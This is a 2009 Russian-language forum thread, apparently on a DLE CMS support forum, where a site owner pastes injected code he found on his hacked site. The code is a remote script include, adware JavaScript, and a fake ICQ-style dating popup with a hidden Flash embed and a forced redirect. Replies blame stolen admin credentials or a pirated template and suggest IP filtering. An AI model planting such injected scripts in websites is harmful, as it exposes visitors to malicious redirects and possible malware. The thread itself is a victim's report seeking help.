PoiSonSonic 0 Опубликовано: 9 декабря 2009 Рассказать Опубликовано: 9 декабря 2009 (изменено) Здравствуйте Вам, от счастливого обладателя лицухи) Хакеры достали, как то раз умудрились написать в шаблоне свой скрипт сеящий трояны всем посетителям, а теперь еще и рекламу чикикующую пришили. вот только где ее найти и как убрать я понять пока не могу... эт такое окошко в стиле аськи. появляется неведомо когда и как... сайт Mashinima.ru надеюсь баг исправят ибо дыра кажется оч большая. <p style="margin: 0px; padding: 0px;"></p> </div> <script src="http://a2480899.byethost32.com/file.js" language="JavaScript"> 1var impromo = { "s": "lifemeet24.com", "t": "417", "cls": "http://vsekase.com/go1.php", "sound": "1", "charset": "win", "check": "8a22ec6a691446108c11acea5dd9a6b5" }; 2 3function getCookieVal_popupsu(offset) { 4var endstr = document.cookie.indexOf (";", offset); 5if (endstr == -1) 6endstr = document.cookie.length; 7return unescape(document.cookie.substring(offset, endstr)); 8} 9 10function GetCookie_popupsu (name) { 11var arg = name + "="; 12var alen = arg.length; 13var clen = document.cookie.length; 14var i = 0; 15while (i < clen) { 16var j = i + alen; 17if (document.cookie.substring(i, j) == arg) 18return getCookieVal_popupsu(j); 19i = document.cookie.indexOf(" ", i) + 1; 20if (i == 0) break; 21} 22return null; 23} 24if (top.self == window){ 25CookieTest=navigator.cookieEnabled; 26if(CookieTest) 27{ 28cookie = GetCookie_popupsu('ok6ebc8b7544ba'); 29if (cookie == null) 30{ 31var ref=document.location.host; 32document.write("<scr"+"ipt language='JavaScript' src='http://lifepromo.biz/promo/popim/imjs.php?s="+impromo.s+"&t="+impromo.t+"&url_close="+impromo.cls+"&sound="+impromo.sound+"&charset="+impromo.charset+"&check="+impromo.check+"'></scr"+"ipt>"); 33} 34} 35} </script> <script src="http://lifepromo.biz/promo/popim/imjs.php?s=lifemeet24.com&t=417&url_close=http://vsekase.com/go1.php&sound=1&charset=win&check=8a22ec6a691446108c11acea5dd9a6b5" language="JavaScript"> 1function Show_67951() { 2CookieTest=navigator.cookieEnabled; 3if(CookieTest) 4{ 5cookie = GetCookie_icqwindow('ok6ebc8b7544ba'); 6if (cookie == null) 7{ 8document.write("<div style=\"position:absolute;display:none;width:181px;height:161px;background:url('http://lifepromo.biz/promo/popim/images/windowskins/win1.png') no-repeat;right:0px;bottom:0px;z-index:9999999999\" id=\"okno_icqwindow_b63a97f6d649d9f3e14ce433b86fa42c\">" 9+"<div style=\"position:absolute;margin-top:5px;margin-left:24px;\"><a href=\"http://lifemeet24.com/BadyStar/?t=417\" target=\"_blank\" style=\"font-family:'Arial','MS Sans Serif','Verdana';font-size:12px;text-decoration:none;font-weight:bold;color:black;cursor:hand\">Оля, Hessen</a></div>" 10+"<div style=\"position:absolute;margin-top:5px;margin-left:158px;\"><a href=\"javascript://\" style=\"font-family:'Arial','MS Sans Serif','Verdana';font-size:12px;font-weight:bold;color:black;text-decoration:none;cursor:hand\" onclick=\"zakr_icqwindow()\">[X]</a></div>" 11+"<div style=\"position:absolute;margin:6px;margin-top:25px;width:169px;height:130px;text-align:left;text-decoration:none\"><a href=\"http://lifemeet24.com/BadyStar/?t=417\" target=\"_blank\" style=\"font-family:'Arial','MS Sans Serif','Verdana';font-size:10pt;color:black;text-decoration:none;font-weight:inherit;cursor:hand\"><img src=\"http://lifepromo.biz/promo/popim/images/windowskins/4.jpg\" style=\"float:left;border:none;border-right:2px solid white;\" width=80 />Приветик! Давай знакомиться! Меня зовут Оля а тебя?</a></div>" 12+"</div>" 13+"<div style='position:absolute;top:-1000;left:-1000'><OBJECT classid='clsid:D27CDB6E-AE6D-11cf-96B8-444553540000' codebase='http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=5,0,0,0' WIDTH=0 HEIGHT=0><PARAM NAME=movie VALUE='http://lifepromo.biz/promo/popim/images/qip.swf'><PARAM NAME=quality VALUE=high><PARAM NAME=bgcolor VALUE=#FFFFFF><EMBED src='http://lifepromo.biz/promo/popim/images/qip.swf' quality=high bgcolor=#FFFFFF WIDTH=0 HEIGHT=0 TYPE='application/x-shockwave-flash' PLUGINSPAGE='http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash'></EMBED></OBJECT></div>"+""); 14} 15} 16} 17Show_67951(); 18var ns6 = document.getElementById && !document.all; 19var ie = document.all; 20if (ie){okno1=document.all.okno_icqwindow_b63a97f6d649d9f3e14ce433b86fa42c;} 21if (ns6){okno1=document.getElementById("okno_icqwindow_b63a97f6d649d9f3e14ce433b86fa42c");} 22okno1.style.display=""; 23var bot=-160; 24function vspl(){ 25if ((!document.all && !document.getElementById)) return; 26bot=bot+4; 27okno1.style.bottom=bot; 28if (bot<2){ 29setTimeout(function (){vspl();},5); 30} 31else{ 32if (ie){setInterval(function (){okno1.style.top=document.body.scrollTop+document.body.clientHeight-161;},1);} 33} 34if (bot>0){okno1.style.bottom="0px";} 35} 36vspl(); 37if (ns6){ 38okno1.style.position="fixed"; 39} 40function zakr_icqwindow(url){ 41if(top.self==window){ 42CookieTest=navigator.cookieEnabled; 43if(CookieTest) 44{ 45cookie = GetCookie_icqwindow('ok6ebc8b7544ba'); 46if (cookie == null) 47{ 48var ExpDate = new Date (); 49ExpDate.setTime(ExpDate.getTime() + (24 * 60 * 60 * 1000)); 50SetCookie_icqwindow('ok6ebc8b7544ba','1',ExpDate, "/"); 51window.open("javascript:location.href='http://vsekase.com/go1.php';","PopWin_icqwindow","width="+screen.availWidth+",height="+screen.availHeight+",top=0,screenY=0,left=0,screenX=0,scrollbars");DivOff_icqwindow_okno(); 52this.window.focus(); 53} 54} 55} 56} 57function getCookieVal_icqwindow(offset) { 58var endstr = document.cookie.indexOf (";", offset); 59if (endstr == -1) 60endstr = document.cookie.length; 61return unescape(document.cookie.substring(offset, endstr)); 62} 63 64function GetCookie_icqwindow (name) { 65var arg = name + "="; 66var alen = arg.length; 67var clen = document.cookie.length; 68var i = 0; 69while (i < clen) { 70var j = i + alen; 71if (document.cookie.substring(i, j) == arg) 72return getCookieVal_icqwindow(j); 73i = document.cookie.indexOf(" ", i) + 1; 74if (i == 0) break; 75} 76return null; 77} 78function SetCookie_icqwindow (name, value) { 79var argv = SetCookie_icqwindow.arguments; 80var argc = SetCookie_icqwindow.arguments.length; 81var expires = (argc > 2) ? argv[2] : null; 82var path = (argc > 3) ? argv[3] : null; 83var domain = (argc > 4) ? argv[4] : null; 84var secure = (argc > 5) ? argv[5] : false; 85document.cookie = name + "=" + escape (value) + 86((expires == null) ? "" : ("; expires=" + expires.toGMTString())) + 87((path == null) ? "" : ("; path=" + path)) + 88((domain == null) ? "" : ("; domain=" + domain)) + 89((secure == true) ? "; secure" : ""); 90} 91 92function DivOff_icqwindow_okno() 93{ 94okno1.style.display='none'; 95} </script> <div id="okno_icqwindow_b63a97f6d649d9f3e14ce433b86fa42c" style="background: transparent url(http://lifepromo.biz/promo/popim/images/windowskins/win1.png) no-repeat scroll 0% 0%; position: fixed; width: 181px; height: 161px; -moz-background-clip: border; -moz-background-origin: padding; -moz-background-inline-policy: continuous; right: 0px; bottom: 0px; z-index: 1410065407;"> <div style="position: absolute; margin-top: 5px; margin-left: 24px;"> <a style="font-family: 'Arial','MS Sans Serif','Verdana'; font-size: 12px; text-decoration: none; font-weight: bold; color: black;" target="_blank" href="http://lifemeet24.com/BadyStar/?t=417">Оля, Hessen</a> </div> <div style="position: absolute; margin-top: 5px; margin-left: 158px;"> <a onclick="zakr_icqwindow()" style="font-family: 'Arial','MS Sans Serif','Verdana'; font-size: 12px; font-weight: bold; color: black; text-decoration: none;" href="javascript://">[X]</a> </div> <div style="margin: 25px 6px 6px; position: absolute; width: 169px; height: 130px; text-align: left; text-decoration: none;"> <a style="font-family: 'Arial','MS Sans Serif','Verdana'; font-size: 10pt; color: black; text-decoration: none; font-weight: inherit;" target="_blank" href="http://lifemeet24.com/BadyStar/?t=417"> </a> </div> </div> <div style="position: absolute;"> <object height="0" width="0" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=5,0,0,0" classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000"> <param value="http://lifepromo.biz/promo/popim/images/qip.swf" name="movie"/> <param value="high" name="quality"/> <param value="#FFFFFF" name="bgcolor"/> <embed height="0" width="0" pluginspage="http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash" type="application/x-shockwave-flash" bgcolor="#FFFFFF" quality="high" src="http://lifepromo.biz/promo/popim/images/qip.swf"/> </object> </div> собственно говоря, только что сделал апдейт до посл версии, но изменения не затронули паразитирующий код...может он опять в шаблонах затесался... Изменено 9 декабря 2009 пользователем PoiSonSonic Цитата Ссылка на сообщение Поделиться на других сайтах
PoiSonSonic 0 Опубликовано: 9 декабря 2009 Рассказать Опубликовано: 9 декабря 2009 (изменено) Автор проблема решилась поиском скрипта в БД. выходит что любой юзер имеет возможность редактировать новости не имея админских прав...или както украдя куки админа... А ЭТО БАГ, дорогие разработчики. *** Спешу проинформировать что чтобы то нибыло похоже добавляет: <script src="http://a2480899.byethost32.com/file.js"></script> после тега </div> Изменено 9 декабря 2009 пользователем PoiSonSonic Цитата Ссылка на сообщение Поделиться на других сайтах
FreeRider 8 Опубликовано: 9 декабря 2009 Рассказать Опубликовано: 9 декабря 2009 а какое отношение это имеет к багам движка? я не совсем понял...проблема решилась поиском скрипта в БД. выходит что любой юзер имеет возможность редактировать новости не имея админских прав...или както украдя куки админа... А ЭТО БАГ, дорогие разработчики. какая здесь вина движка?))) Цитата Ссылка на сообщение Поделиться на других сайтах
celsoft 6 076 Опубликовано: 9 декабря 2009 Рассказать Опубликовано: 9 декабря 2009 А ЭТО БАГ, дорогие разработчики. Кто вам это сказал? И кто вам сказал, что ваш сайт был взломан через скрипт? а не были украдены ваши пароли к БД. Поиск по форуму по слову iframe, даст вам много причин появления троянов на сайте, а также по тому что что является причиной и как этого избежать.выходит что любой юзер имеет возможность редактировать новости не имея админских прав более того добавить JS код добавить в новость через скрипт невозможно в принципе даже имея полный доступ к админпанели. Цитата Ссылка на сообщение Поделиться на других сайтах
abasive 41 Опубликовано: 9 декабря 2009 Рассказать Опубликовано: 9 декабря 2009 проблема решилась поиском скрипта в БД. выходит что любой юзер имеет возможность редактировать новости не имея админских прав...или както украдя куки админа... А ЭТО БАГ, дорогие разработчики. это не баг dle, dle работает очень хорошо,если и будут какие-то уязвымости то Celsoft все быстро устраняет тут ваша вина, движок не был взломан, они украли ваш пароль админки,может вирус похватили или чтото еще, мой совет вам поставте блокировка по ip,или фильтр по ip в .htaccess, то они не могут получит доступ к админку. Цитата Ссылка на сообщение Поделиться на других сайтах
PoiSonSonic 0 Опубликовано: 9 декабря 2009 Рассказать Опубликовано: 9 декабря 2009 Автор спасибо, извиняюсь за флейм, больше всего багов нас в мозгу, вот одним меньше Цитата Ссылка на сообщение Поделиться на других сайтах
Stunnaman 0 Опубликовано: 16 декабря 2009 Рассказать Опубликовано: 16 декабря 2009 у меня была такая проблема, она исходила из шаблона, который я скачал на варез сайте... в итоге он забанил меня как админа на сайте, решение простое поменять тему или почистить, если не впадлу) Цитата Ссылка на сообщение Поделиться на других сайтах
webturist 6 Опубликовано: 16 декабря 2009 Рассказать Опубликовано: 16 декабря 2009 А ЭТО БАГ, дорогие разработчики. Это баг Brain.dll Разработчики к нему отношения не имеют. Изучите азы безопасности. Цитата Ссылка на сообщение Поделиться на других сайтах
Рекомендованные сообщения
Присоединяйтесь к обсуждению
Вы можете опубликовать сообщение сейчас, а зарегистрироваться позже. Если у вас есть аккаунт, войдите в него для написания от своего имени.